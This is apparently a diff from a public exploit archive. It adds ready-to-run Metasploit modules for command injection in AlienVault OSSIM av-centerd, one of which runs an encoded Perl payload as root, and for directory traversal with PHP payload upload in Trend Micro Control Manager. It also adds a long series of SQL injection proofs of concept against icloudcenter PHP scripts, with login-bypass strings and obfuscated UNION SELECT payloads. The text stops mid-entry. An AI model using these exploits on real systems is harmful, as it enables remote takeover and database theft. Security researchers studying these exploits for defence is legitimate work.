def initialize
super(
'Name' => 'Alienvault OSSIM av-centerd Util.pm sync_rserver Command Execution',
'Description' => %q{
This module exploits a command injection vulnerability found within the sync_rserver
function in Util.pm. The vulnerability is triggered due to an incomplete blacklist
during the parsing of the $uuid parameter. This allows for the escaping of a system
command allowing for arbitrary command execution as root
},
'References' =>
[
[ 'CVE', '2014-3804' ],
[ 'ZDI', '14-197' ],
[ 'URL', 'http://forums.alienvault.com/discussion/2690' ],
],
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Jun 11 2014')
register_options([
Opt::RPORT(40007),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('CMD', [ false, 'This is the file to download', 'touch /tmp/file.txt'])
], self.class)
end
def run
soap = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n"
soap += "<soap:Envelope xmlns:soap=\"http:\/\/schemas.xmlsoap.org/soap/envelope/\"\r\n"
soap += "xmlns:soapenc=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding/\" xmlns:xsd=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\r\n"
soap += "xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\r\n"
soap += "soap:encodingStyle=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\">\r\n"
soap += "<soap:Body>\r\n"
soap += "<sync_rserver xmlns=\"AV\/CC\/Util\">\r\n"
soap += "<c-gensym3 xsi:type=\"xsd:string\">All</c-gensym3>\r\n"
soap += "<c-gensym5 xsi:type=\"xsd:string\">& #{datastore['CMD']} </c-gensym5>\r\n"
soap += "<c-gensym7 xsi:type=\"xsd:string\">#{datastore['RHOST']}</c-gensym7>\r\n"
soap += "<c-gensym9 xsi:type=\"xsd:string\">#{Rex::Text.rand_text_alpha(4 + rand(4))}</c-gensym9>\r\n"
soap += "</sync_rserver>\r\n"
soap += "</soap:Body>\r\n"
soap += "</soap:Envelope>\r\n"
res = send_request_cgi(
{
'uri' => '/av-centerd',
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => soap,
'headers' => {
'SOAPAction' => "\"AV/CC/Util#sync_rserver\""
}
}, 20)
if res && res.code == 200
print_good("Command executed successfully!")
else
print_bad("Something went wrong...")
end
end
end
__END__
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub sync_rserver
{
my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname ) = @_;
verbose_log_file(
"SYNC RSERVER TASK : Received call from $uuid : ip source = $admin_ip, hostname = $hostname:($funcion_llamada,$nombre)"
);
if ($uuid =~ /[;`\$\<\>\|]/) {
console_log_file("Not allowed uuid: $uuid in sync_rserver\n");
my @ret = ("Error");
return \@ret;
}
my $conn = Avtools::get_database();
my $sqlfile = "/tmp/sync_${uuid}.sql";
my $sqlfile_old = "/tmp/sync_${uuid}.sql.old";
my $sqlfile_md5 = `md5sum $sqlfile | awk '{print \$1}'`;
my $sqlfile_content;
my $status = 1;
my $counter = 0;
my @ret;
my $query = qq{};
my $dbq;
if ( -f $sqlfile_old )
{
my $sqlfile_old_md5 = `md5sum $sqlfile_old | awk '{print \$1}'`;
debug_log_file ("Old MD5: $sqlfile_old_md5 New MD5: $sqlfile_md5");
if ( $sqlfile_md5 eq $sqlfile_old_md5 )
{
unlink $sqlfile;
verbose_log_file ("Already sync'ed!");
return "0";
}
else
{
unlink $sqlfile_old;
}
}
my $query_array = `ossim-db < $sqlfile 2>&1`;
$query_array =~ s/[\s\n]+$//g;
if ($query_array ne '')
{
$status = $query_array;
}
else
{
$status = 0;
}
if ( ! (defined $status) or $status == 0 )
{
if ( grep /RESTART\sOSSIM\-SERVER/, $sqlfile )
{
verbose_log_file("RESTART OSSIM-SERVER MARK found. Restarting ossim-server");
system('/etc/init.d/ossim-server restart');
}
else
{
debug_log_file("RESTART OSSIM-SERVER MARK not found. Skipping ossim-server restart");
}
$query = qq{REPLACE INTO alienvault.config (conf, value) VALUES ('latest_asset_change', utc_timestamp())};
debug_log_file($query);
$dbq = $conn->prepare($query);
$dbq->execute();
$dbq->finish();
}
else
{
verbose_log_file ("Error syncing rservers: ${status}");
}
debug_log_file("Move file: $sqlfile");
move ($sqlfile, $sqlfile . ".old");
# push @ret, "0";
return "0";
}

171
platforms/linux/remote/42709.rb Executable file
View file

@ -0,0 +1,171 @@
require 'msf/core'
require 'rexml/document'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include REXML
def initialize(info = {})
super(update_info(info,
'Name' => 'Alienvault OSSIM av-centerd Command Injection get_log_line',
'Description' => %q{
This module exploits a command injection flaw found in the get_log_line
function found within Util.pm. The vulnerability is triggered due to an
unsanitized $r_file parameter passed to a string which is then executed
by the system
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-3805' ],
[ 'OSVDB', '107992' ]
],
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' =>
{
'SSL' => true,
},
'Payload' =>
{
'Compat' => {
'RequiredCmd' => 'perl netcat-e openssl python gawk'
}
},
'DefaultTarget' => 0,
'Targets' =>
[
['Alienvault <= 4.7.0',{}]
],
'DisclosureDate' => 'Jul 18 2014'))
register_options([Opt::RPORT(40007)], self.class)
end
def check
version = ""
res = send_soap_request("get_dpkg")
if res &&
res.code == 200 &&
res.headers['SOAPServer'] &&
res.headers['SOAPServer'] =~ /SOAP::Lite/ &&
res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/
version = $1
end
if version.empty? || version >= "4.7.0"
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Appears
end
end
def build_soap_request(method)
xml = Document.new
xml.add_element(
"soap:Envelope",
{
"xmlns:xsi" => "http://www.w3.org/2001/XMLSchema-instance",
"xmlns:soapenc" => "http://schemas.xmlsoap.org/soap/encoding/",
"xmlns:xsd" => "http://www.w3.org/2001/XMLSchema",
"soap:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/",
"xmlns:soap" => "http://schemas.xmlsoap.org/soap/envelope/"
})
body = xml.root.add_element("soap:Body")
m = body.add_element(method, { 'xmlns' => "AV/CC/Util" })
args = []
args[0] = m.add_element("c-gensym3", {'xsi:type' => 'xsd:string'})
args[0].text = "All"
args[1] = m.add_element("c-gensym5", {'xsi:type' => 'xsd:string'})
args[1].text = "423d7bea-cfbc-f7ea-fe52-272ff7ede3d2"
args[2] = m.add_element("c-gensym7", {'xsi:type' => 'xsd:string'})
args[2].text = "#{datastore['RHOST']}"
args[3] = m.add_element("c-gensym9", {'xsi:type' => 'xsd:string'})
args[3].text = "#{rand_text_alpha(4 + rand(4))}"
args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})
args[4].text = "/var/log/auth.log"
args[5] = m.add_element("c-gensym13", {'xsi:type' => 'xsd:string'})
perl_payload = "system(decode_base64"
perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
args[5].text = "1;perl -MMIME::Base64 -e '#{perl_payload}';"
xml.to_s
end
def send_soap_request(method, timeout=20)
soap = build_soap_request(method)
res = send_request_cgi({
'uri' => '/av-centerd',
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => soap,
'headers' => {
'SOAPAction' => "\"AV/CC/Util##{method}\""
}
}, timeout)
res
end
def exploit
send_soap_request("get_log_line", 1)
end
end
__END__
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub get_log_line {
my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $r_file, $number_lines )
= @_;
verbose_log_file(
"GET LOG LINE : Received call from $uuid : ip source = $admin_ip, hostname = $hostname :($funcion_llamada,$r_file)"
);
my @ret = ("$systemuuid");
if ( $r_file =~ /\.\./ ){
push(@ret,"File not auth");
return \@ret;
}
if ( $number_lines <= 0) {
push(@ret,"Error in number lines");
return \@ret;
}
if (( $r_file =~ /^\/var\/log\// ) or ( $r_file =~ /^\/var\/ossec\/alerts\// ) or ( $r_file =~ /^\/var\/ossec\/logs\// )){
if (! -f "$r_file" ){
push(@ret,"File not found");
return \@ret;
}
push(@ret,"ready");
my $command = "tail -$number_lines $r_file";
#push(@ret,"$command");
#my @content = `tail -$number_lines $r_file`;
my @content = `$command`;
push(@ret,@content);
return \@ret;
}
else {
push(@ret,"path not auth");
return \@ret;
}
}

116
platforms/php/remote/42692.rb Executable file
View file

@ -0,0 +1,116 @@
require 'msf/core'
require 'msf/core/exploit/php_exe'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Trend Micro Control Manager importFile Directory Traversal RCE',
'Description' => %q{
This module exploits a directory traversal vulnerability found in Trend Micro
Control Manager. The vulnerability is triggered when sending a specially crafted
fileName (containing ../'s) parameter to the importFile.php script. This will allow
for writing outside of the ImportPolicy directory.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'ZDI', '17-060' ],
[ 'URL', 'https://success.trendmicro.com/solution/1116624' ]
],
'Payload' =>
{
'BadChars' => "\x00",
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 07 2017'))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to TMCM', '/webapp']),
OptBool.new('SSL', [ true, 'Use SSL', true]),
Opt::RPORT(443),
], self.class)
end
def exploit
require 'securerandom'
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
boundary = SecureRandom.hex
payload_name = "#{rand_text_alpha(5)}.php"
print_status("Uploading #{payload_name} to the server...")
cookies = "ASP_NET_SessionId=55hjl0burcvx21uslfxjbabs; "
cookies << "wf_cookie_path=%2F; WFINFOR=#{rand_text_alpha(10)}; "
cookies << "PHPSESSID=fc4o2lg5fpgognc28sjcitugj1; "
cookies << "wf_CSRF_token=bd52b54ced23d3dc257984f68c39d34b; "
cookies << "un=a8cad04472597b0c1163743109dad8f1; userID=1; "
cookies << "LANG=en_US; "
cookies << "wids=modTmcmCriticalEvents%2CmodTmcmUserThreatDetection%2CmodTmcmAppStatusSrv%2CmodTmcmTopThreats%2CmodTmcmEndpointThreatDetection%2CmodTmcmCompCompliance%2C; "
cookies << "lastID=65; cname=mainConsole; theme=default; lastTab=-1"
post_body = []
post_body << "--#{boundary}\r\n"
post_body << "Content-Disposition: form-data; name=\"action\"\r\n\r\n"
post_body << "importPolicy\r\n"
post_body << "--#{boundary}\r\n"
post_body << "Content-Disposition: form-data; name=\"fileSize\"\r\n\r\n"
post_body << "2097152\r\n"
post_body << "--#{boundary}\r\n"
post_body << "Content-Disposition: form-data; name=\"fileName\"\r\n\r\n"
post_body << "../../../widget_60_2899/repository/db/sqlite/#{payload_name}\r\n"
post_body << "--#{boundary}\r\n"
post_body << "Content-Disposition: form-data; name=\"filename\";\r\n"
post_body << "filename=\"policy.cmpolicy\"\r\n"
post_body << "Content-Type: application/octet-stream\r\n\r\n"
post_body << "<?php #{payload.raw} ?>\r\n\r\n"
post_body << "--#{boundary}--\r\n"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri("#{uri}", "widget", "repository", "widgetPool", "wp1", "widgetBase", "modTMCM", "inc", "importFile.php"),
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_body.join,
'headers' => {
'Cookie' => cookies,
'Accept-Encoding' => "gzip;q=1.0,deflate;q=0.6,identity;q=0.3",
'Connection' => "close",
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language' => "en-US,en;q=0.5",
},
})
if res.body =~ /Import Successfully/
print_good("#{payload_name} uploaded successfully!")
print_status("Attempting to execute payload...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("#{uri}", "widget_60_2899", "repository", "db", "sqlite", "#{payload_name}"),
'headesr' => {
'Cookie' => cookies
}
})
else
print_error("Something went wrong...")
end
end
end

31
platforms/php/webapps/42667.txt Executable file
View file

@ -0,0 +1,31 @@
# # # # #
# Exploit Title: Unique Low Bid Auction Script 3.3 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/unique-low-bid-auction-script.htm
# Demo: http://www.icloudcenter.net/demos/iclowbidauction/
# Version: 3.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/admin
#
# User: 'or 1=1 or ''=' Pass: anything
#
# http://localhost/[PATH]/admin/viewuserips.php?id=[SQL]
# http://localhost/[PATH]/admin/editadminuser.php?id=[SQL]
#
# Etc..
# # # # #

27
platforms/php/webapps/42668.txt Executable file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: MLM Software Script 2.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/mlm-script.htm
# Demo: http://www.icloudcenter.net/demos/icmlm/
# Version: 2.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# '+/*!00007uNiOn*/+/*!00007SelEct*/+0x283129,0x283229,0x3c68313e496873616e2053656e63616e3c2f68313e,(/*!50000Select*/+export_set(5,@:=0,(/*!50000select*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!50000table_name*/,0x3c6c693e,2),/*!50000column_name*/,0xa3a,2)),@,2))--+-
#
# Etc..
# # # # #

25
platforms/php/webapps/42669.txt Executable file
View file

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Hotel Reservation Site Script 3.3 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/hotel-reservation-site-script.htm
# Demo: http://icloudcenter.net/demos/ichotelreservation/
# Version: 3.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# Etc..
# # # # #

25
platforms/php/webapps/42670.txt Executable file
View file

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: eBay like Auction PHP Script 2.2 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/ebay-like-auction-script.htm
# Demo: http://icloudcenter.net/demos/icauction/
# Version: 2.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/item.php?id=[SQL]
#
# Etc..
# # # # #

25
platforms/php/webapps/42671.txt Executable file
View file

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Doctor Appointment Script 1.3 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/doctor-appointment-script.htm
# Demo: http://icloudcenter.net/demos/icdoctorappointment/
# Version: 1.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# Etc..
# # # # #

25
platforms/php/webapps/42672.txt Executable file
View file

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Restaurant Site Script 1.4 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/restaurant-site-script.htm
# Demo: http://icloudcenter.net/demos/icrestaurant/
# Version: 1.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# Etc..
# # # # #

31
platforms/php/webapps/42673.txt Executable file
View file

@ -0,0 +1,31 @@
# # # # #
# Exploit Title: Dutch Auction Script 1.2 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/dutch-auction-script.htm
# Demo: http://icloudcenter.net/demos/icdutchauction/
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/admin
#
# User: 'or 1=1 or ''=' Pass: anything
#
# http://localhost/[PATH]/admin/viewuserips.php?id=[SQL]
# http://localhost/[PATH]/admin/editadminuser.php?id=[SQL]
#
# Etc..
# # # # #

29
platforms/php/webapps/42674.txt Executable file
View file

@ -0,0 +1,29 @@
# # # # #
# Exploit Title: Auto Dealer Car Sales PHP Script 2.2 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/auto-dealer-car-sales-script.htm
# Demo: http://icloudcenter.net/demos/icautosales/
# Version: 2.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?cmd=do_car_search&type=7&mod_id=[SQL]
#
# http://localhost/[PATH]/index.php?cmd=advertise_details&category=car&aid=[SQL]
#
# http://localhost/[PATH]/index.php?cmd=directory&parent=[SQL]
#
# Etc..
# # # # #

27
platforms/php/webapps/42675.txt Executable file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Travel Site Script 2.2 - Authentication Bypass
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/traveling-website-script.htm
# Demo: http://icloudcenter.net/demos/ICPenny/
# Version: 2.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/admin
#
# User: 'or 1=1 or ''=' Pass: anything
#
# Etc..
# # # # #

31
platforms/php/webapps/42676.txt Executable file
View file

@ -0,0 +1,31 @@
# # # # #
# Exploit Title: Classifieds Software Script Like Craigslist 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/craigslist-like-classifieds-script.htm
# Demo: http://icloudcenter.net/demos/icclassifieds/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/post_details.php?city=0&id=[SQL]
#
# -3061'++/*!00004UNION*/+/*!00004SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,(/*!00004Select*/+export_set(5,@:=0,(/*!00004select*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00004table_name*/,0x3c6c693e,2),/*!00004column_name*/,0xa3a,2)),@,2)),0x496873616e2053656e63616e,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137--+-
#
# http://localhost/[PATH]/view_posts.php?city=[SQL]
#
# http://localhost/[PATH]/index.php?c=[SQL]
#
# Etc..
# # # # #

27
platforms/php/webapps/42677.txt Executable file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Students Course Assessment Test Script 1.2 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/student-course-assessment-test-script.htm
# Demo: http://icloudcenter.net/demos/icstudents/
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_page&key=[SQL]
#
# -EfE'+/*!00009UniOn*/+/*!00009SelEcT*/+0x31,0x32,0x3c68313e494853414e2053454e43414e3c2f68313e,(/*!00009Select*/+export_set(5,@:=0,(/*!00009select*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00009table_name*/,0x3c6c693e,2),/*!00009column_name*/,0xa3a,2)),@,2))--+-
#
# Etc..
# # # # #

27
platforms/php/webapps/42678.txt Executable file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: ICSurvey- Survey Creating Script 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/survey-creating-script.htm
# Demo: http://icloudcenter.net/demos/icsurvey/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_page&key=[SQL]
#
# http://localhost/[PATH]/survey.php?page=preview&test=[SQL]
#
# Etc..
# # # # #

25
platforms/php/webapps/42679.txt Executable file
View file

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Jewelry Store Site Script 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/jewelry-site-script.htm
# Demo: http://icloudcenter.net/demos/icjewelry/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# Etc..
# # # # #

25
platforms/php/webapps/42680.txt Executable file
View file

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Custom T-Shirt WebStore Script 1.2 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/t-shirt.htm
# Demo: http://icloudcenter.net/demos/ictshirt/
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# Etc..
# # # # #

25
platforms/php/webapps/42681.txt Executable file
View file

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Customized Products Shopping Script 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/bpProductConfigurator.htm
# Demo: http://icloudcenter.net/demos/icproductconfigurator/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# Etc..
# # # # #

25
platforms/php/webapps/42682.txt Executable file
View file

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Grocery Store Supermarket Script 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/grocery-store-supermarket-script.htm
# Demo: http://icloudcenter.net/demos/icgrocery/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# Etc..
# # # # #

25
platforms/php/webapps/42684.txt Executable file
View file

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Car Rental Script 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/limousine-car-hire-script.html
# Demo: http://icloudcenter.net/demos/iccalllimousine/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# Etc..
# # # # #

31
platforms/php/webapps/42685.txt Executable file
View file

@ -0,0 +1,31 @@
# # # # #
# Exploit Title: Project Bidding Script 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/project_bidding_script.htm
# Demo: http://www.icloudcenter.net/demos/icprojectbidding/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/admin
#
# User: 'or 1=1 or ''=' Pass: anything
#
# http://localhost/[PATH]/admin/viewuserips.php?id=[SQL]
# http://localhost/[PATH]/admin/editadminuser.php?id=[SQL]
#
# Etc..
# # # # #

25
platforms/php/webapps/42686.txt Executable file
View file

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Dental Clinic Site Script 1.2 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/dental-clinic-script.htm
# Demo: http://icloudcenter.net/demos/icdentalclinic/
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# Etc..
# # # # #

25
platforms/php/webapps/42688.txt Executable file
View file

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Support Tickets Helpdesk PHP Script 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/support-tickets-helpdesk-script.htm
# Demo: http://icloudcenter.net/demos/ichelpdesk/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&pk=[SQL]
#
# Etc..
# # # # #

29
platforms/php/webapps/42689.txt Executable file
View file

@ -0,0 +1,29 @@
# # # # #
# Exploit Title: Website Builder Script With e-Commerce 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/site-builder-script.htm
# Demo: http://icloudcenter.net/demos/icsitebuilder/
# Version: 1.1
# Category: Webapps
